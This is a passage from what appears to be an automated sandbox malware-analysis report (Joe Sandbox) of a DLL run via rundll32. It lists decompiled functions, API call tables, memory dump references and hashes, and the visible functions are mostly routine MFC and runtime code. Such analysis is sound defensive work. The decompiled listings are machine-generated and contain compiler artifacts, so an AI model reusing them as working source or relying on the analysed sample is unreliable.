                                                                                                          • Part of subcall function 1002F197: RegCloseKey.ADVAPI32(?), ref: 1002F228
                                                                                                          • Part of subcall function 1002F197: RegCloseKey.ADVAPI32(?), ref: 1002F22D
                                                                                                          • Part of subcall function 1002F197: RegCloseKey.ADVAPI32(?), ref: 1002F232
                                                                                                        • GetProcAddress.KERNEL32(00000000,DllGetClassObject,00000000,00000004,1002F8F1,?,10061C90,00000000), ref: 1002F8A8
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CloseOpen$AddressH_prolog3ProcQueryValue_swprintf
                                                                                                        • String ID: DllGetClassObject
                                                                                                        • API String ID: 2239898804-1075368562
                                                                                                        • Opcode ID: 8b70eba10d805db1dccae6f450fe3e4f62e0ad0a9677ed5200ec260016c76068
                                                                                                        • Instruction ID: 7d584b9490b15b981f5dc21b1d9290b8b4b9f252c987884c33fde78667bb7070
                                                                                                        • Opcode Fuzzy Hash: 8b70eba10d805db1dccae6f450fe3e4f62e0ad0a9677ed5200ec260016c76068
                                                                                                        • Instruction Fuzzy Hash: 21118F3950025AABDB00EFE4CC01AFEB764EF443E4F54062CF921AB291DF30A92497A5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 10037E90, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E10037E90(void* __ecx, void* __eflags, intOrPtr _a4, signed int _a8) {
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t26;
				intOrPtr _t32;
				void* _t36;
				signed int _t37;
				void* _t40;
				intOrPtr _t41;
				signed int _t42;
				void* _t43;

				_t39 = __ecx;
				_t43 = __ecx;
				_t26 = E1000AB4C(_t36, __ecx, _t40, __ecx, __eflags);
				_t41 =  *((intOrPtr*)(_t26 + 0x3c));
				if(_a4 != 0) {
					_t42 = _a8;
					__eflags =  *(__ecx + 0x3c) & _t42;
					if(__eflags == 0) {
						 *((intOrPtr*)(E1000AB19(_t36, _t42, __ecx, __eflags) + 0x38)) = 0x10037e80;
						_t24 = _t43 + 0x3c;
						 *_t24 =  *(_t43 + 0x3c) | _t42;
						__eflags =  *_t24;
					}
				} else {
					_t37 = _a8;
					if(( *(__ecx + 0x3c) & _t37) != 0) {
						_t49 =  *((intOrPtr*)(_t26 + 0x40)) - __ecx;
						if( *((intOrPtr*)(_t26 + 0x40)) == __ecx) {
							E1000D197(_t39, _t49, 1);
						}
						if(_t41 != 0 &&  *(_t41 + 0x20) != 0) {
							E1003E9B0(_t41,  &_v52, 0, 0x30);
							_t32 =  *((intOrPtr*)(_t43 + 0x20));
							_v44 = _t32;
							_v40 = _t32;
							_v52 = 0x28;
							_v48 = 1;
							SendMessageA( *(_t41 + 0x20), 0x405, 0,  &_v52);
						}
						 *(_t43 + 0x3c) =  *(_t43 + 0x3c) &  !_t37;
					}
				}
				return 1;
			}



















                                                                                                        0x10037e90
                                                                                                        0x10037e99
                                                                                                        0x10037e9b
                                                                                                        0x10037ea4
                                                                                                        0x10037ea7
                                                                                                        0x10037f09
                                                                                                        0x10037f0c
                                                                                                        0x10037f0f
                                                                                                        0x10037f16
                                                                                                        0x10037f1d
                                                                                                        0x10037f1d
                                                                                                        0x10037f1d
                                                                                                        0x10037f1d
                                                                                                        0x10037ea9
                                                                                                        0x10037ea9
                                                                                                        0x10037eaf
                                                                                                        0x10037eb1
                                                                                                        0x10037eb4
                                                                                                        0x10037eb8
                                                                                                        0x10037eb8
                                                                                                        0x10037ebf
                                                                                                        0x10037ecf
                                                                                                        0x10037ed4
                                                                                                        0x10037eda
                                                                                                        0x10037edd
                                                                                                        0x10037eee
                                                                                                        0x10037ef5
                                                                                                        0x10037efc
                                                                                                        0x10037efc
                                                                                                        0x10037f04
                                                                                                        0x10037f04
                                                                                                        0x10037eaf
                                                                                                        0x10037f27

                                                                                                        APIs
                                                                                                        • _memset.LIBCMT ref: 10037ECF
                                                                                                        • SendMessageA.USER32 ref: 10037EFC
                                                                                                          • Part of subcall function 1000D197: SendMessageA.USER32 ref: 1000D1B7
                                                                                                          • Part of subcall function 1000D197: GetKeyState.USER32 ref: 1000D1CD
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessageSend$State_memset
                                                                                                        • String ID: (
                                                                                                        • API String ID: 930327405-3887548279
                                                                                                        • Opcode ID: 6aee1d976bf16fe924a29216daac6e2f71c86c44a97ff5b34455909ed0167a95
                                                                                                        • Instruction ID: 4d5724259ee9609962e24001b4df4018e44fe8d5b9b4689e79abb7c5e21a5655
                                                                                                        • Opcode Fuzzy Hash: 6aee1d976bf16fe924a29216daac6e2f71c86c44a97ff5b34455909ed0167a95
                                                                                                        • Instruction Fuzzy Hash: 8211A735900304AFD762DFA1D881B8AB7F4FF04752F11452AE5496B682D7B1E800CF64
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 100270E6, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 76%
                                                                                                        			E100270E6(void* __ecx) {
				signed int _v8;
				char _v16;
				char _v18;
				char _v280;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t11;
				long _t14;
				intOrPtr _t15;
				char* _t18;
				intOrPtr _t21;
				intOrPtr _t33;
				signed int _t36;

				_t11 =  *0x10072650; // 0xb5e27fef
				_v8 = _t11 ^ _t36;
				_t35 = 0x104;
				_t14 = GetModuleFileNameA( *(__ecx + 0x44),  &_v280, 0x104);
				if(_t14 == 0 || _t14 == 0x104) {
					L4:
					_t15 = 0;
					__eflags = 0;
				} else {
					_t18 = PathFindExtensionA( &_v280);
					_t35 = "%s.dll";
					asm("movsd");
					asm("movsw");
					_t32 =  &_v280;
					_t41 = _t18 -  &_v280 + 7 - 0x106;
					asm("movsb");
					_t33 = _t33;
					if(_t18 -  &_v280 + 7 > 0x106) {
						goto L4;
					} else {
						E10025E38(_t21,  &_v280, _t33, "%s.dll", _t36, _t18,  &_v18 - _t18,  &_v16);
						_t15 = E10026DFF(_t21,  &_v280, _t33, "%s.dll", _t41,  &_v280);
					}
				}
				return E10039F21(_t15, _t21, _v8 ^ _t36, _t32, _t33, _t35);
			}

















                                                                                                        0x100270ef
                                                                                                        0x100270f6
                                                                                                        0x100270fc
                                                                                                        0x1002710c
                                                                                                        0x10027114
                                                                                                        0x1002716b
                                                                                                        0x1002716b
                                                                                                        0x1002716b
                                                                                                        0x1002711a
                                                                                                        0x10027122
                                                                                                        0x10027128
                                                                                                        0x10027130
                                                                                                        0x10027131
                                                                                                        0x10027135
                                                                                                        0x10027140
                                                                                                        0x10027146
                                                                                                        0x10027147
                                                                                                        0x10027148
                                                                                                        0x00000000
                                                                                                        0x1002714a
                                                                                                        0x10027155
                                                                                                        0x10027164
                                                                                                        0x10027164
                                                                                                        0x10027148
                                                                                                        0x10027179

                                                                                                        APIs
                                                                                                        • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 1002710C
                                                                                                        • PathFindExtensionA.SHLWAPI(?), ref: 10027122
                                                                                                          • Part of subcall function 10025E38: _strcpy_s.LIBCMT ref: 10025E44
                                                                                                          • Part of subcall function 10026DFF: __EH_prolog3.LIBCMT ref: 10026E1E
                                                                                                          • Part of subcall function 10026DFF: GetModuleHandleA.KERNEL32(kernel32.dll,00000058), ref: 10026E3F
                                                                                                          • Part of subcall function 10026DFF: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 10026E50
                                                                                                          • Part of subcall function 10026DFF: ConvertDefaultLocale.KERNEL32(?), ref: 10026E86
                                                                                                          • Part of subcall function 10026DFF: ConvertDefaultLocale.KERNEL32(?), ref: 10026E8E
                                                                                                          • Part of subcall function 10026DFF: GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 10026EA2
                                                                                                          • Part of subcall function 10026DFF: ConvertDefaultLocale.KERNEL32(?), ref: 10026EC6
                                                                                                          • Part of subcall function 10026DFF: ConvertDefaultLocale.KERNEL32(000003FF), ref: 10026ECC
                                                                                                          • Part of subcall function 10026DFF: GetModuleFileNameA.KERNEL32(10000000,?,00000105), ref: 10026F05
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ConvertDefaultLocale$Module$AddressFileNameProc$ExtensionFindH_prolog3HandlePath_strcpy_s
                                                                                                        • String ID: %s.dll
                                                                                                        • API String ID: 3444012488-3668843792
                                                                                                        • Opcode ID: 80b707b738ec157545c5c13e6dacbb66e6d8939c01ed30b767a5e140996c9d8e
                                                                                                        • Instruction ID: 384c36ff4a710e52d999548e7966680b7d81728ab1ab625db8d3a649f26a0346
                                                                                                        • Opcode Fuzzy Hash: 80b707b738ec157545c5c13e6dacbb66e6d8939c01ed30b767a5e140996c9d8e
                                                                                                        • Instruction Fuzzy Hash: 85017971A001186FDF18EB68DD559EF73FCEF08700F4105A9E906E3240EA74AB148A51
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 10033268, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E10033268(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
				struct tagRECT _v20;
				int _t25;
				void* _t42;

				_t42 = __ecx;
				 *(__ecx + 0x5c) =  *(__ecx + 0x5c) | 0xffffffff;
				 *((intOrPtr*)(__ecx + 0x60)) = _a4;
				 *((intOrPtr*)(__ecx + 0x64)) = _a8;
				if( *((intOrPtr*)(__ecx + 0x20)) != 0 && (E10011632(__ecx) & 0x00300000) != 0) {
					E1000D329(__ecx, 0, 0, 1);
					E1000D329(__ecx, 1, 0, 1);
					E1000D3E6(__ecx, 3, 0);
				}
				GetClientRect( *(_t42 + 0x20),  &_v20);
				_t25 = _v20.right - _v20.left;
				 *(_t42 + 0x68) = _t25;
				 *((intOrPtr*)(_t42 + 0x6c)) = _v20.bottom - _v20.top;
				if( *(_t42 + 0x20) != 0) {
					E10032C01(_t42);
					_t25 = InvalidateRect( *(_t42 + 0x20), 0, 1);
				}
				return _t25;
			}






                                                                                                        0x10033272
                                                                                                        0x10033274
                                                                                                        0x10033279
                                                                                                        0x10033284
                                                                                                        0x10033287
                                                                                                        0x1003329b
                                                                                                        0x100332a7
                                                                                                        0x100332b1
                                                                                                        0x100332b1
                                                                                                        0x100332bd
                                                                                                        0x100332c9
                                                                                                        0x100332d2
                                                                                                        0x100332d5
                                                                                                        0x100332d8
                                                                                                        0x100332dc
                                                                                                        0x100332e7
                                                                                                        0x100332e7
                                                                                                        0x100332f0

                                                                                                        APIs
                                                                                                        • GetClientRect.USER32 ref: 100332BD
                                                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 100332E7
                                                                                                          • Part of subcall function 10011632: GetWindowLongA.USER32 ref: 1001163D
                                                                                                          • Part of subcall function 1000D329: SetScrollPos.USER32 ref: 1000D34E
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Rect$ClientInvalidateLongScrollWindow
                                                                                                        • String ID: n^t
                                                                                                        • API String ID: 2076638976-440804003
                                                                                                        • Opcode ID: 054f6d390cf0081b8b24c2422c7d83862ba5f4fab520aa5eaa3fd9d11cb29cc2
                                                                                                        • Instruction ID: 9c3d965ad4d931dcb600be09aa1e2d4bf4f670b0e7d40ed63a4842e0c47abf58
                                                                                                        • Opcode Fuzzy Hash: 054f6d390cf0081b8b24c2422c7d83862ba5f4fab520aa5eaa3fd9d11cb29cc2
                                                                                                        • Instruction Fuzzy Hash: B6113035A00714AFDB25DB69C845AAFF7F9FF84B50F00461EF492A6290DBB1AA40CB51
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 10012BAD, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41libraryloaderCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 51%
                                                                                                        			E10012BAD(void* __ecx, void* __edi) {
				signed short _v16;
				signed short _v20;
				char _v24;
				void* __ebx;
				void* __esi;
				void* __ebp;
				signed int _t7;
				void* _t18;
				intOrPtr* _t19;
				void* _t24;
				signed int _t25;

				_t7 =  *0x10071880; // 0xffffffff
				_t32 = _t7 - 0xffffffff;
				if(_t7 != 0xffffffff) {
					return _t7;
				}
				_push(_t18);
				_push(_t24);
				_t19 = GetProcAddress(E1000E343( *((intOrPtr*)( *((intOrPtr*)(E1000AB19(_t18, __edi, _t24, _t32) + 0x78))))), "DllGetVersion");
				_t25 = 0x40000;
				if(_t19 != 0) {
					E1003E9B0(__edi,  &_v24, 0, 0x14);
					_push( &_v24);
					_v24 = 0x14;
					if( *_t19() >= 0) {
						_t25 = (_v20 & 0x0000ffff) << 0x00000010 | _v16 & 0x0000ffff;
					}
				}
				 *0x10071880 = _t25;
				return _t25;
			}














                                                                                                        0x10012bb0
                                                                                                        0x10012bb8
                                                                                                        0x10012bbb
                                                                                                        0x10012c1e
                                                                                                        0x10012c1e
                                                                                                        0x10012bbd
                                                                                                        0x10012bbe
                                                                                                        0x10012bda
                                                                                                        0x10012bde
                                                                                                        0x10012be3
                                                                                                        0x10012bed
                                                                                                        0x10012bf8
                                                                                                        0x10012bf9
                                                                                                        0x10012c04
                                                                                                        0x10012c11
                                                                                                        0x10012c11
                                                                                                        0x10012c04
                                                                                                        0x10012c13
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                          • Part of subcall function 1000E343: GetModuleHandleA.KERNEL32(?,00000000,10012BCE,00000000,00000000,100046B4,B5E27FEF,?,?,00000000,100045E5,?,B5E27FEF), ref: 1000E34F
                                                                                                          • Part of subcall function 1000E343: LoadLibraryA.KERNEL32(?,?,?,00000000,100045E5,?,B5E27FEF), ref: 1000E35F
                                                                                                        • GetProcAddress.KERNEL32(00000000,DllGetVersion,00000000,00000000,100046B4,B5E27FEF,?,?,00000000,100045E5,?,B5E27FEF), ref: 10012BD4
                                                                                                        • _memset.LIBCMT ref: 10012BED
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AddressHandleLibraryLoadModuleProc_memset
                                                                                                        • String ID: DllGetVersion
                                                                                                        • API String ID: 3385804498-2861820592
                                                                                                        • Opcode ID: 4438af943961bb3b9e91a039a70a94ab490cd7bf61670a402e56abf6f2750ece
                                                                                                        • Instruction ID: ca3adb3662c6778137da144dfec51b1eda58001eaa43a4a95b79cef36846b6d4
                                                                                                        • Opcode Fuzzy Hash: 4438af943961bb3b9e91a039a70a94ab490cd7bf61670a402e56abf6f2750ece
                                                                                                        • Instruction Fuzzy Hash: 32F031B1E002259AE740EBACDC85B9E73E8EB04794F510261EA14F71D2E774DE9487A1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 10029831, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 83%
                                                                                                        			E10029831(intOrPtr __ebx, intOrPtr __edx, intOrPtr __edi, struct HWND__* _a4, intOrPtr _a8) {
				signed int _v8;
				char _v20;
				void* __esi;
				signed int _t7;
				signed int _t16;
				intOrPtr _t18;
				intOrPtr _t23;
				intOrPtr _t24;
				struct HWND__* _t25;
				signed int _t26;

				_t24 = __edi;
				_t23 = __edx;
				_t18 = __ebx;
				_t7 =  *0x10072650; // 0xb5e27fef
				_v8 = _t7 ^ _t26;
				_t25 = _a4;
				if(_t25 != 0) {
					if((GetWindowLongA(_t25, 0xfffffff0) & 0x0000000f) != _a8) {
						goto L1;
					} else {
						GetClassNameA(_t25,  &_v20, 0xa);
						_t16 = E1000D035( &_v20, "combobox");
						asm("sbb eax, eax");
						_t11 =  ~_t16 + 1;
					}
				} else {
					L1:
					_t11 = 0;
				}
				return E10039F21(_t11, _t18, _v8 ^ _t26, _t23, _t24, _t25);
			}













                                                                                                        0x10029831
                                                                                                        0x10029831
                                                                                                        0x10029831
                                                                                                        0x10029837
                                                                                                        0x1002983e
                                                                                                        0x10029842
                                                                                                        0x10029847
                                                                                                        0x1002985c
                                                                                                        0x00000000
                                                                                                        0x1002985e
                                                                                                        0x10029865
                                                                                                        0x10029874
                                                                                                        0x1002987c
                                                                                                        0x1002987f
                                                                                                        0x1002987f
                                                                                                        0x10029849
                                                                                                        0x10029849
                                                                                                        0x10029849
                                                                                                        0x10029849
                                                                                                        0x1002988c

                                                                                                        APIs
                                                                                                        • GetWindowLongA.USER32 ref: 10029850
                                                                                                        • GetClassNameA.USER32(00000000,?,0000000A), ref: 10029865
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ClassLongNameWindow
                                                                                                        • String ID: combobox
                                                                                                        • API String ID: 1147815241-2240613097
                                                                                                        • Opcode ID: f12ca2ce1131c6aed5cfad8a27d5ddc0fe4ef1f764689a8bcd09fd7b0149b3ca
                                                                                                        • Instruction ID: 7cd22905bc921d95dbbf7a6d00d167587a0338e7e177b58db4d5b0897e1d3b99
                                                                                                        • Opcode Fuzzy Hash: f12ca2ce1131c6aed5cfad8a27d5ddc0fe4ef1f764689a8bcd09fd7b0149b3ca
                                                                                                        • Instruction Fuzzy Hash: B7F0B43161012AAFDB01EF64CC85EAE73A8EF06294B940626E851E7080DA30FA0587A5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 10032803, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E10032803(intOrPtr __ebx, char __ecx, intOrPtr __edx, intOrPtr __edi, void* __eflags) {
				signed int _v8;
				struct HDC__* _v88;
				char _v92;
				struct tagRECT _v108;
				void* __esi;
				void* __ebp;
				signed int _t19;
				intOrPtr _t36;
				char _t38;
				signed int _t39;

				_t40 = __eflags;
				_t36 = __edx;
				_t19 =  *0x10072650; // 0xb5e27fef
				_v8 = _t19 ^ _t39;
				_t38 = __ecx;
				E10009120(__ebx,  &_v92, __edi, __ecx, __eflags);
				GetClientRect( *(_t38 + 0x20),  &_v108);
				_v108.left = _v108.left + 1;
				_v108.top = _v108.top + 1;
				_v108.right = _v108.right - 1;
				_v108.bottom = _v108.bottom - 1;
				E100325BA( &_v92,  &_v108);
				DrawIcon(_v88, 0, 0,  *(_t38 + 0x74));
				return E10039F21(E10009174(__ebx,  &_v92, __edi, _t38, _t40), __ebx, _v8 ^ _t39, _t36, __edi, _t38, __ecx);
			}













                                                                                                        0x10032803
                                                                                                        0x10032803
                                                                                                        0x10032809
                                                                                                        0x10032810
                                                                                                        0x10032814
                                                                                                        0x1003281a
                                                                                                        0x10032826
                                                                                                        0x1003282c
                                                                                                        0x1003282f
                                                                                                        0x10032832
                                                                                                        0x10032835
                                                                                                        0x1003283f
                                                                                                        0x1003284e
                                                                                                        0x10032868

                                                                                                        APIs
                                                                                                          • Part of subcall function 10009120: __EH_prolog3.LIBCMT ref: 10009127
                                                                                                          • Part of subcall function 10009120: BeginPaint.USER32(?,?,00000004,1003281F), ref: 10009153
                                                                                                        • GetClientRect.USER32 ref: 10032826
                                                                                                          • Part of subcall function 100325BA: Ellipse.GDI32(?,?,?,?,?), ref: 100325CC
                                                                                                        • DrawIcon.USER32 ref: 1003284E
                                                                                                          • Part of subcall function 10009174: __EH_prolog3.LIBCMT ref: 1000917B
                                                                                                          • Part of subcall function 10009174: EndPaint.USER32(?,?,00000004,1003285C), ref: 10009196
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: H_prolog3Paint$BeginClientDrawEllipseIconRect
                                                                                                        • String ID: n^t
                                                                                                        • API String ID: 1519701795-440804003
                                                                                                        • Opcode ID: c0243cdffed27d251df2c4ad4dbf0815c844f957b5253b9c2be9b75364de2a32
                                                                                                        • Instruction ID: adf53102796b076a59f840a3c0315d1260355d9b8725bbee87c9c6663115db88
                                                                                                        • Opcode Fuzzy Hash: c0243cdffed27d251df2c4ad4dbf0815c844f957b5253b9c2be9b75364de2a32
                                                                                                        • Instruction Fuzzy Hash: A4F03C71A0021C9FDF05EFE0CC56AEEBBB8FF04305F000126E802BA065DA70AA45DB40
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 1002966C, Relevance: 5.0, APIs: 4, Instructions: 37COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 82%
                                                                                                        			E1002966C(void* __ebx, void* __esi, void* __ebp, signed int _a4) {
				void* __edi;
				struct _CRITICAL_SECTION* _t4;
				void* _t7;
				void* _t10;
				signed int _t11;
				void* _t14;
				intOrPtr* _t15;
				void* _t17;

				_t17 = __ebp;
				_t14 = __esi;
				_t7 = __ebx;
				_t11 = _a4;
				_t20 = _t11 - 0x11;
				if(_t11 >= 0x11) {
					_t4 = E1000836F(__ebx, _t10, _t11, __esi, _t20);
				}
				if( *0x10098f10 == 0) {
					_t4 = E10029648();
				}
				_push(_t7);
				_push(_t17);
				_push(_t14);
				_t15 = 0x100990c8 + _t11 * 4;
				if( *_t15 == 0) {
					EnterCriticalSection(0x100990b0);
					if( *_t15 == 0) {
						_t4 = 0x10098f18 + _t11 * 0x18;
						InitializeCriticalSection(_t4);
						 *_t15 =  *_t15 + 1;
					}
					LeaveCriticalSection(0x100990b0);
				}
				EnterCriticalSection(0x10098f18 + _t11 * 0x18);
				return _t4;
			}











                                                                                                        0x1002966c
                                                                                                        0x1002966c
                                                                                                        0x1002966c
                                                                                                        0x1002966d
                                                                                                        0x10029671
                                                                                                        0x10029674
                                                                                                        0x10029676
                                                                                                        0x10029676
                                                                                                        0x10029682
                                                                                                        0x10029684
                                                                                                        0x10029684
                                                                                                        0x10029689
                                                                                                        0x10029690
                                                                                                        0x10029691
                                                                                                        0x10029692
                                                                                                        0x100296a1
                                                                                                        0x100296a8
                                                                                                        0x100296ad
                                                                                                        0x100296b4
                                                                                                        0x100296b7
                                                                                                        0x100296bd
                                                                                                        0x100296bd
                                                                                                        0x100296c4
                                                                                                        0x100296c4
                                                                                                        0x100296d0
                                                                                                        0x100296d6

                                                                                                        APIs
                                                                                                        • EnterCriticalSection.KERNEL32(100990B0,?,?,?,?,10029CDD,00000010,00000008,1000AB47,1000AAEA,10008389,1000AB51,10008F14,00000000,10008F7E,00000001), ref: 100296A8
                                                                                                        • InitializeCriticalSection.KERNEL32(?,?,?,?,?,10029CDD,00000010,00000008,1000AB47,1000AAEA,10008389,1000AB51,10008F14,00000000,10008F7E,00000001), ref: 100296B7
                                                                                                        • LeaveCriticalSection.KERNEL32(100990B0,?,?,?,?,10029CDD,00000010,00000008,1000AB47,1000AAEA,10008389,1000AB51,10008F14,00000000,10008F7E,00000001), ref: 100296C4
                                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,?,10029CDD,00000010,00000008,1000AB47,1000AAEA,10008389,1000AB51,10008F14,00000000,10008F7E,00000001), ref: 100296D0
                                                                                                          • Part of subcall function 1000836F: __CxxThrowException@8.LIBCMT ref: 10008383
                                                                                                          • Part of subcall function 1000836F: __EH_prolog3.LIBCMT ref: 10008390
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
